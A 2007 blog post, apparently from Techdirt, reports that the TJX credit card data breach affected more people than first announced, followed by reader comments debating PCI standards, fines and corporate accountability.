Remember How TJX Was The Worst Data Breach In History? Well, It Was Actually Worse

from the stunning-incompetence dept

In the last few years, every time a massive data breach is reported, you can be assured of one thing: a few weeks after the initial report comes out, a second report will come out admitting that the breach was worse than previously expected. We saw it with Choicepoint. We saw it with the VA. It seems to always happen. In fact, with the now infamous TJX breach, we'd already mentioned that the problems were worse than originally announced -- making it the largest such breach ever reported. This wasn't surprising once you found out just how incompetent the company was -- failing to comply with nearly all of the credit card company's security guidelines and leaving their entire system wide open to anyone who could hack a simple insecure WEP WiFi system (something that's quite easily done). The data from the breach (unlike many other widely announced breaches) has already been used in numerous frauds, costing upwards of $60 million. With such astounding incompetence and a breach so large, should it come as any surprise that even the updated breach numbers weren't complete? That's right, thanks to documents being filed in the lawsuits against TJX, it's now coming out that the breach has impacted even more people than was earlier announced. Of course, the question still remains whether or not the punishment the company receives will matter. It doesn't seem like anything is really done to stop companies from being so careless, and there's no indication that's going to change in this case either.


Reader Comments (rss)

(Flattened / Threaded)

  1.  
    identicon
    GrammarMan, Oct 29th, 2007 @ 6:51pm

    Quick... first sentence, change "the breach was worse that" to "the breach was worse than" and then delete my comment! :p

     

    reply to this | link to this | view in thread ]

  2.  
    icon
    Mike (profile), Oct 29th, 2007 @ 7:33pm

    Re:

    Quick... first sentence, change "the breach was worse that" to "the breach was worse than" and then delete my comment! :p

    Heh. No reason to delete... thanks for pointing out the mistake. It's now been fixed.

     

    reply to this | link to this | view in thread ]

  3.  
    identicon
    Anonymous Coward, Oct 29th, 2007 @ 8:32pm

    "Of course, the question still remains whether or not the punishment the company receives will matter. It doesn't seem like anything is really done to stop companies from being so careless, and there's no indication that's going to change in this case either."

    What the !@#$ are you talking about?

    Have you ever heard of the new Payment Card Industry (PCI) standards Visa/Mastercard et all are enforcing? They pretty much forcing anyone who processes credit cards to adhere to a certain set of security standards or you pay big $$ fines.

     

    reply to this | link to this | view in thread ]

  4.  
    identicon
    Anonymous Coward, Oct 29th, 2007 @ 10:11pm

    Re:

    Really? Fines in upwards of US$60M then to keep it in scale with the losses suffered by consumers affected by the negligence of TJX?

    Hm, I didn't see fines like that discussed in the PCI standards...

     

    reply to this | link to this | view in thread ]

  5.  
    identicon
    Shamalama, Oct 29th, 2007 @ 11:09pm

    consequences and repercussions

    Losing the ability to process payment cards, or at least the major two, can cause a pretty significant financial hit to most of these companies. Although I doubt people are quick to pull out the charge card at TJX these days anyway. I say pull their ability to do in house processing and give the process to a competent vendor or even an arm of the CC companies themselves and make offenders pay ridiculous fee's. Hmm... unless they start passing that on to the consumer as a "convenience fee". OK: Cash only, then probation with vendor, then triple factor authentication at the point of sale with terminal on regularly audited secure/compliant network. Eh screw that. Just implant the zero liability paypass chip in my *&%$@! and let the CC comps pay the fee's (with my ridiculous interest) should some bastard scan my *&$@#!. This is why I want to see a presidential candidate come out on a ticket to change the national currency to women and beer. Not only could we then get beer from the bank but we wouldnt have to carry around a wallet because.. crap.I should go to sleep.

     

    reply to this | link to this | view in thread ]

  6.  
    identicon
    Michael E, Oct 30th, 2007 @ 3:28am

    Consequences

    I don't know how much TJX will actually get fined based on the scope of the breach to end consumers. With what I've been reading on the matter, TJX will throw out cupons and the like to consumers affected by the breach. This is kind of amusing to me as they have also claimed that they could not have notified the end consumer since they don't have that information... So how are they going to send out those cupons then?

    From the corp perspective, damages imposed by the courts will also depend on the litigating parties. There has been evidence displayed that the faults in TJXs security was weak and nothing substantive was done to curb them then either by PCI or other member organizations. So the depth of the scope can be limited to when the PCI 1.0 standard was ratified and when TJX filed a Report of Compliance that stated they were compliant (which I fail to see given their status). If they did file and they are found to have falsified their filing, then the hammer can really be dropped on them.

    The really big issue here isn't really the security but governance. There has been evidence of IT insiders within TJX crying 'wolf' only to have management fail to undertake the necessary risk assessments conducted to fully quantify the risks involved. There are no laws against poor management but there is recourse in the form of market confidence. If anything will hurt TJX it will come from the folks that hold their stock. If they started to dump their stocks then the company management will also take a severe beating as it is likely that they also have some skin tied up in the company's valuation.

    My 0.02c.

     

    reply to this | link to this | view in thread ]

  7.  
    identicon
    MrWizard, Oct 30th, 2007 @ 3:49am

    Re:

    You've got to be kidding.
    They can't/won't enforce their existing standards.
    What makes you think they'll enforce their "new" standards?

    And the Visa/MC penalties? What a joke.
    After the largest databreach ever, was TJX banned from Visa/MC?
    Nope.

     

    reply to this | link to this | view in thread ]

  8.  
    identicon
    Jeremy, Oct 30th, 2007 @ 4:27am

    Umm...

    "...wide open to anyone who could hack a simple insecure WEP WiFi system..."

    Does that mean we have WEP WiFi with self-esteem issues? Or perhaps that it should be UNsecure?

     

    reply to this | link to this | view in thread ]

  9.  
    identicon
    Chronno S. Trigger, Oct 30th, 2007 @ 6:01am

    Re: Umm...

    Insecure, Adg, Lacking in security or safety; "his fortune was increasingly insecure"; "an insecure future".

    Sad to say, I probably have a more secure network at home.

     

    reply to this | link to this | view in thread ]

  10.  
    identicon
    Chris, Oct 30th, 2007 @ 6:13am

    Re: Re:

    After the largest databreach ever, was TJX banned from Visa/MC?
    Nope.

    No, Visa/MC just ban companies that follow the law of their country that the RIAA don't like. Ie. allofmp3.com....

     

    reply to this | link to this | view in thread ]

  11.  
    identicon
    Anonymous Coward, Oct 30th, 2007 @ 7:04am

    Re: Re: Re:

    Somehow I knew it was the RIAA's fault.

     

    reply to this | link to this | view in thread ]

  12.  
    identicon
    Anonymous Coward, Oct 30th, 2007 @ 7:25am

    Big deal...

    Forget the fines forget being banned from Visa/Master the only thing that will happen is that a few peons (MAYBE a manager) will get fired and have a gag order put on them (so they can't tell what really happened), some free credit monitoring and some discount coupons will be given to customers, a then the upper management and share holders will continue to rake in several million a year.

     

    reply to this | link to this | view in thread ]

  13.  
    identicon
    freak3dot, Oct 30th, 2007 @ 9:10am

    TJX Message

    Has anyone read the letter from the President and CEO of TJX? Good for a laugh if nothing else.
    http://www.tjx.com/tjx_message.html

    freak3dot

     

    reply to this | link to this | view in thread ]

  14.  

    Who committed the biggest crime?

    Let's not forget that someone else "Stole" that information from TJX. I have not seen one post putting the blame on the hacker.

     

    reply to this | link to this | view in thread ]

  15.  
    identicon
    Jeremy, Oct 31st, 2007 @ 4:03am

    I stand corrected.

     

    reply to this | link to this | view in thread ]


Add Your Comment

Have a Techdirt Account? Sign in now. Want one? Register here
Get Techdirt’s Daily Email
Save me a cookie
  • Note: A CRLF will be replaced by a break tag (<br>), all other allowable HTML will remain intact
  • Allowed HTML Tags: <b> <i> <a> <em> <br> <strong> <blockquote> <hr> <tt>
Follow Techdirt
A word from our sponsors...
Essential Reading
Techdirt Reading List
Techdirt Insider Chat
A word from our sponsors...
Recent Stories
A word from our sponsors...

Close

Email This